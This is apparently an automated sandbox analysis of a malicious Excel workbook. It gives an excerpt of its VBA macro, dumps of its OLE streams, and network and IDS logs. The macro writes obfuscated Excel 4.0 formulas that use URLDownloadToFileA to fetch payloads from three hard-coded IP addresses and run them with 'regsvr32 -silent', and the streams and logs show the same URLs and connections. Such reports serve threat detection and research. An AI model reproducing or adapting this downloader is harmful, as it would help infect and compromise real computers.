    Sheets("Sheettt").Range("K17") = "=N" & "O" & "W()"
    Sheets("Sheettt").Range("K18") = ".d" & "a" & "t"
    
    
    
    Sheets("Sheettt").Range("H35") = "=" & "H" & "ALT()"
    Sheets("Sheettt").Range("I9") = "u" & "R" & "l" & "M" & "o" & "n"
    Sheets("Sheettt").Range("I10") = UserForm2.Caption
    Sheets("Sheettt").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
    Sheets("Sheettt").Range("I12") = "Byukilos"
    Sheets("Sheettt").Range("G10") = "..\Celod.wac"
    Sheets("Sheettt").Range("G11") = "..\Celod.wac1"
    Sheets("Sheettt").Range("G12") = "..\Celod.wac2"
    Sheets("Sheettt").Range("I17") = DUJSKFASD
    Sheets("Sheettt").Range("I18") = DUJSKFASD & "1"
    Sheets("Sheettt").Range("I19") = DUJSKFASD & "2"
    Sheets("Sheettt").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
    Sheets("Sheettt").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
    Sheets("Sheettt").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
    Sheets("Sheettt").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
    Sheets("Sheettt").Range("H17") = Drezden & Naret & "(I17)"
    Sheets("Sheettt").Range("H18") = Drezden & Naret & "(I18)"
    Sheets("Sheettt").Range("H19") = Drezden & Naret & "(I19)"
    
    
    Application.Run Sheets("Sheettt").Range("H1")
    
    End Sub
    VBA File Name: Sheet1, Stream Size: 991
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
    VBA File Name:Sheet1
    Stream Size:991
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "Sheet1"
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    VBA File Name: ThisWorkbook, Stream Size: 3459
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
    VBA File Name:ThisWorkbook
    Stream Size:3459
    Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 32 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 39 04 00 00 b1 0a 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "ThisWorkbook"
    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = True
    Option Explicit
    Public Sub applyLogosToDashboard()
        On Error Resume Next
    Application.ScreenUpdating = False
    
    If Not Application.OperatingSystem Like "*Mac*" Then
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = False
        ActiveSheet.Shapes("Win_Logo").Visible = True
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
        ActiveSheet.Shapes("Button_Print_PDF").Visible = True
        ActiveSheet.Shapes("Button_Save_As").Visible = True
        ActiveSheet.Shapes("Button_Help").Visible = True
        ActiveSheet.Shapes("Button_Versions").Visible = True
        Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    Else
    
        Sheets("Dashboard").Activate
        Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
        ActiveSheet.Shapes("Apple_Logo").Visible = True
        ActiveSheet.Shapes("Win_Logo").Visible = False
        ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
        ActiveSheet.Shapes("Button_Print_PDF").Visible = False
        ActiveSheet.Shapes("Button_Save_As").Visible = False
        Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True
    
    End If
    
        Application.ScreenUpdating = True
    
    End Sub
    
    
    Private Sub asWorkbook_Activateas()
    
    End Sub
    
    Private Sub saWorkbook_Opensa()
        On Error Resume Next
    
    
    End Sub
    
    Private Sub ssaaInitWorkbookssaa()
    End Sub
    VBA File Name: UserForm2, Stream Size: 1182
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
    VBA File Name:UserForm2
    Stream Size:1182
    Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    VBA Code
    Attribute VB_Name = "UserForm2"
    Attribute VB_Base = "0{86A322E3-3EAA-43BD-A15C-2E5BDAB20ADE}{6DC45358-AAC1-427A-8A44-4B339D5A54C8}"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    Attribute VB_TemplateDerived = False
    Attribute VB_Customizable = False

    Streams

    Stream Path: \x1CompObj, File Type: data, Stream Size: 108
    General
    Stream Path:\x1CompObj
    File Type:data
    Stream Size:108
    Entropy:4.18849998853
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:244
    Entropy:2.65175227267
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:208
    Entropy:3.33231709703
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . r . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101931
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:101931
    Entropy:7.65144710562
    Base64 Encoded:True
    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V q % 8 . . . . . . . X . @
    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 704
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:704
    Entropy:5.29068090087
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
    Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
    Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTlk
    File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
    Stream Size:30
    Entropy:1.37215976263
    Base64 Encoded:False
    Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
    Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 140
    General
    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
    File Type:data
    Stream Size:140
    Entropy:3.43277227638
    Base64 Encoded:False
    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
    File Type:data
    Stream Size:97
    Entropy:3.61064918306
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
    File Type:ASCII text, with CRLF line terminators
    Stream Size:302
    Entropy:4.66028783691
    Base64 Encoded:True
    Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
    Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
    Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 283
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/f
    File Type:data
    Stream Size:283
    Entropy:3.66259370036
    Base64 Encoded:False
    Data ASCII:. . ( . H . . . . . . . . @ . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 5 . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . D . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 t . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . P . . . . . . . L a b e l
    Data Raw:00 04 28 00 48 0c 10 0c 0b 00 00 00 04 40 00 00 ff ff 00 00 12 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 00 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 35 00 d4
    Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 292
    General
    Stream Path:_VBA_PROJECT_CUR/UserForm2/o
    File Type:data
    Stream Size:292
    Entropy:3.97404939222
    Base64 Encoded:True
    Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 6 5 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . $ . ( . . . . . . . h t t p : / / 5 . 1 9 6 . 2 4 7 . 1 1 / . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 8 . 1 1 9 . 1 1 3 . 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . 0 . ( . . . . . . . r e g s v r 3 2 - s i l e n t . . \\ C e l o d . w a c . . .
    Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 36 35 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 24 00 28 00 00 00 14 00 00 80 68 74 74 70 3a 2f 2f 35 2e 31 39 36 2e 32 34 37 2e 31 31 2f 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4544
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4544
    Entropy:4.47759533359
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
    Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2514
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
    File Type:data
    Stream Size:2514
    Entropy:3.52144078534
    Base64 Encoded:False
    Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . < . . . ] . . N
    Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 146
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
    File Type:data
    Stream Size:146
    Entropy:1.48909835582
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 213
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
    File Type:data
    Stream Size:213
    Entropy:1.85324367791
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0c 00
    Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 206
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
    File Type:data
    Stream Size:206
    Entropy:1.75287863305
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1075
    General
    Stream Path:_VBA_PROJECT_CUR/VBA/dir
    File Type:data
    Stream Size:1075
    Entropy:6.6867836299
    Base64 Encoded:True
    Data ASCII:. / . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . R c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
    Data Raw:01 2f b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 bd 98 a0 52 63 01 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    10/08/21-22:31:07.677315ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
    10/08/21-22:31:11.677211ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
    10/08/21-22:31:19.027109ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
    10/08/21-22:31:29.867071ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
    10/08/21-22:31:34.047252ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
    10/08/21-22:31:40.057139ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Oct 8, 2021 22:31:06.830949068 CEST4916780192.168.2.22190.14.37.165
    Oct 8, 2021 22:31:09.835529089 CEST4916780192.168.2.22190.14.37.165
    Oct 8, 2021 22:31:15.842176914 CEST4916780192.168.2.22190.14.37.165
    Oct 8, 2021 22:31:27.858150959 CEST4916880192.168.2.22190.14.37.165
